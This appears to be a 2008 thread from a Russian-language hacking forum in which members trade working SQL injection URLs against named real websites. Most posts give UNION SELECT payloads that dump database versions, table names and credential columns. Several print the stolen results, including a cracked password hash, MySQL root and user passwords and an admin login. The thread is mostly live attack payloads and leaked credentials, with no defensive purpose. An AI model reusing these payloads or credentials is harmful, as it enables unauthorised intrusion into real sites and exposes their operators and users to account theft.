HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 21.06.2008, 19:01
z1k
Новичок
Регистрация: 11.05.2008
Сообщений: 12
Провел на форуме:
36048

Репутация: 5
По умолчанию

Цитата:
Сообщение от Fata1ex  
Научи такие скули находить
ты там ниже пакрути там все есть чото хз чо так вышло
 
Ответить с цитированием

  #2  
Старый 21.06.2008, 19:42
Cr@zy_King
Новичок
Регистрация: 12.09.2007
Сообщений: 8
Провел на форуме:
1010735

Репутация: 20
По умолчанию

http://www.aquasystems.md/readarticle.php?id=-3+union+select+1,2,table_name+from+information_sch ema.tables/*

http://www.aquasystems.md/readarticle.php?id=-3+union+select+1,password,name+from+rgb_members/*

User : OzzZZ
Hass : 6055322b3c1cc50cef132211ca57aa75 Cracked : 29123098

good.



good.
 
Ответить с цитированием

  #3  
Старый 21.06.2008, 20:02
z1k
Новичок
Регистрация: 11.05.2008
Сообщений: 12
Провел на форуме:
36048

Репутация: 5
По умолчанию

Цитата:
Сообщение от Cr@zy_King  
http://www.aquasystems.md/readarticle.php?id=-3+union+select+1,2,table_name+from+information_sch ema.tables/*

http://www.aquasystems.md/readarticle.php?id=-3+union+select+1,password,name+from+rgb_members/*

User : OzzZZ
Hass : 6055322b3c1cc50cef132211ca57aa75 Cracked : 29123098

good.




good.
да да я знаю) я все крутил до последнего) но выложивать не стал т.к. тот кто знает тот розберецца... тут все просто .....
 
Ответить с цитированием

  #4  
Старый 21.06.2008, 20:09
Gorev
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944

Репутация: 1550


По умолчанию

а вот вам добавочка.... правда прикольно? )))

http://www.aquasystem.ro/sectiuni.php?nSId=-3+union+select+1,concat_ws(0x3a,database(),version (),user()),3,4,5,6,7/*

Database Version: 5.0.32-Debian_7etch5-log
Database name: aquasystem
User name: aevum@localhost
 
Ответить с цитированием

  #5  
Старый 21.06.2008, 21:53
sabe
Постоянный
Регистрация: 16.03.2007
Сообщений: 380
Провел на форуме:
1404552

Репутация: 568
По умолчанию

Stolica.ru
Цитата:
http://stolica.ru/s/prop/prop.pl?d&name=price&node=group&node_name=1%27%20u nion%20select%20concat_ws(0x3a,name,passwd)+from+u serreg/*
кароч. очень заплутаный и кривой сайт.)

Atvideo.ru
Цитата:
http://www.atvideo.ru/search/?words=1'
Gorev
Цитата:
http://www.aquasystem.ro/sectiuni.php?nSId=-3+union+select+1,concat_ws(0x3a,client_email,clien t_pwd),3,4,5,6,7+from+client/*
нашел админку: /admin
но нет соответствия в базе.)

Последний раз редактировалось sabe; 22.06.2008 в 02:54..
 
Ответить с цитированием

  #6  
Старый 22.06.2008, 03:59
gisTy
Постоянный
Регистрация: 24.05.2008
Сообщений: 589
Провел на форуме:
3629857

Репутация: 504


По умолчанию

PR 3
Цитата:
http://www.ekomtech.kiev.ua/a-news/news.php?id=-6+union+select+1,2,3,concat(version(),0x3a3a,user( ),0x3a3a,database()),5,6,7,8,9/*
4.1.21-standard-log::ekomtech_ekomtec@localhost::ekomtech_ekomtech


PR 2
Цитата:
http://www.texnostar.com.ua/a-news/news.php?id=-1694+union+select+1,2,3,concat(version(),0x3a3a,us er(),0x3a3a,database()),5,6,7,8,9,0/*
4.1.21-standard-log::texnosta_texno@localhost::texnosta_texno


PR 2
Цитата:
http://www.unimed.com.ua/a-news/news.php?id=-2+union+select+1,2,3,concat(version(),0x3a3a,user( ),0x3a3a,database()),5,6,7,8,9/*
4.1.22::u_unimed@localhost::unimed


PR 4
Цитата:
http://www.worldconnection.nl/wclayout/news.php?site_id=-25+union+select+1,2,3,4,concat(version(),0x3a3a,us er(),0x3a3a,database()),6,7,8,9/*
4.0.12-nt::worldconnection@localhost::worldconnection
есть раскрытие путей: C:\Web\worldconnection.nl\wclayout\news.php


PR 5
Цитата:
http://www.bispublishers.nl/bookpage.php?id=-90+union+select+1,2,concat_ws(0x3a3a,version(),use r(),database()),4,5,6,7,8,9,10,11,12,13,14,15,16,1 7,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33, 34,35,36,37/*
5.0.26-log::eholla_bisa@wh-www22.xs4all.nl::eholla_bis


PR 4
Цитата:
http://www.condoleance.nl/register.php?id=-10254+union+select+1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,u nhex(hex(concat(version(),0x3a3a,user(),0x3a3a,dat abase()))),7,8,9/*&start=1
4.1.5-gamma::bartje@localhost.condoleance.nl::condoleanc e
есть вывод /etc/passwd...
 
Ответить с цитированием

  #7  
Старый 22.06.2008, 05:01
~!DoK_tOR!~
Banned
Регистрация: 10.11.2006
Сообщений: 829
Провел на форуме:
2634544

Репутация: 1559


По умолчанию

www.absoluteaudio.ru - Абсолютное Аудио

Цитата:
http://www.absoluteaudio.ru/diler.phtml?id=-1+UNION+SELECT+1,2,AES_DECRYPT(AES_ENCRYPT(concat_ ws(0x3a,user,password),0x71),0x71),4,5+from+mysql. user/*
root:agashi
javash:12345
chanel:damoda
basilio:asshole
chatstat:chatstat
oleconsulting:123456
news:eprst

Цитата:
http://www.absoluteaudio.ru/diler.phtml?id=-1+UNION+SELECT+1,2,AES_DECRYPT(AES_ENCRYPT(concat_ ws(0x3a,nick_name,password),0x71),0x71),4,5+from+a dmins/*
admin:fk5*du
 
Ответить с цитированием

  #8  
Старый 22.06.2008, 06:13
sabe
Постоянный
Регистрация: 16.03.2007
Сообщений: 380
Провел на форуме:
1404552

Репутация: 568
По умолчанию

Цитата:
http://www.alltime.ru/select.php?addmodel=-99999+union+select+1/*
хмм станно.. бутто 1 колонка. но результатов 0.
Цитата:
http://www.ukrfood.com.ua/references/index.php?id=9999999
и еще непохек.

gisTy
Цитата:
http://www.bispublishers.nl/bookpage.php?id=-90+union+select+unhex(hex(concat_ws(0x3a,user_name ,user_password))),2,3,4,5,6,7,8,9,10,11,12,13,14,1 5,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31, 32,33,34,35,36,37+from+eholla_bis.user/*

Последний раз редактировалось sabe; 22.06.2008 в 11:03..
 
Ответить с цитированием

  #9  
Старый 22.06.2008, 07:43
gisTy
Постоянный
Регистрация: 24.05.2008
Сообщений: 589
Провел на форуме:
3629857

Репутация: 504


По умолчанию

Цитата:
Сообщение от sabe  
...
э... спасибо=)

Последний раз редактировалось gisTy; 05.07.2008 в 14:07..
 
Ответить с цитированием

  #10  
Старый 22.06.2008, 10:06
sabe
Постоянный
Регистрация: 16.03.2007
Сообщений: 380
Провел на форуме:
1404552

Репутация: 568
По умолчанию

Pulset.ru
Цитата:
http://www.bestwatch.ru/watches.phtml?idb=531&idl=-9999999+union+select+1,2,3,4,5,6,7,8,9,10,11,12,co ncat_ws(0x3a,version(),database(),user())/*
Budele.net
Цитата:
http://www.budele.net/full.php?idas=-99999%20UNION%20SELECT%201,concat_ws(0x3a,email,pa rol),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18+from +objav/*

Последний раз редактировалось sabe; 22.06.2008 в 23:46..
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.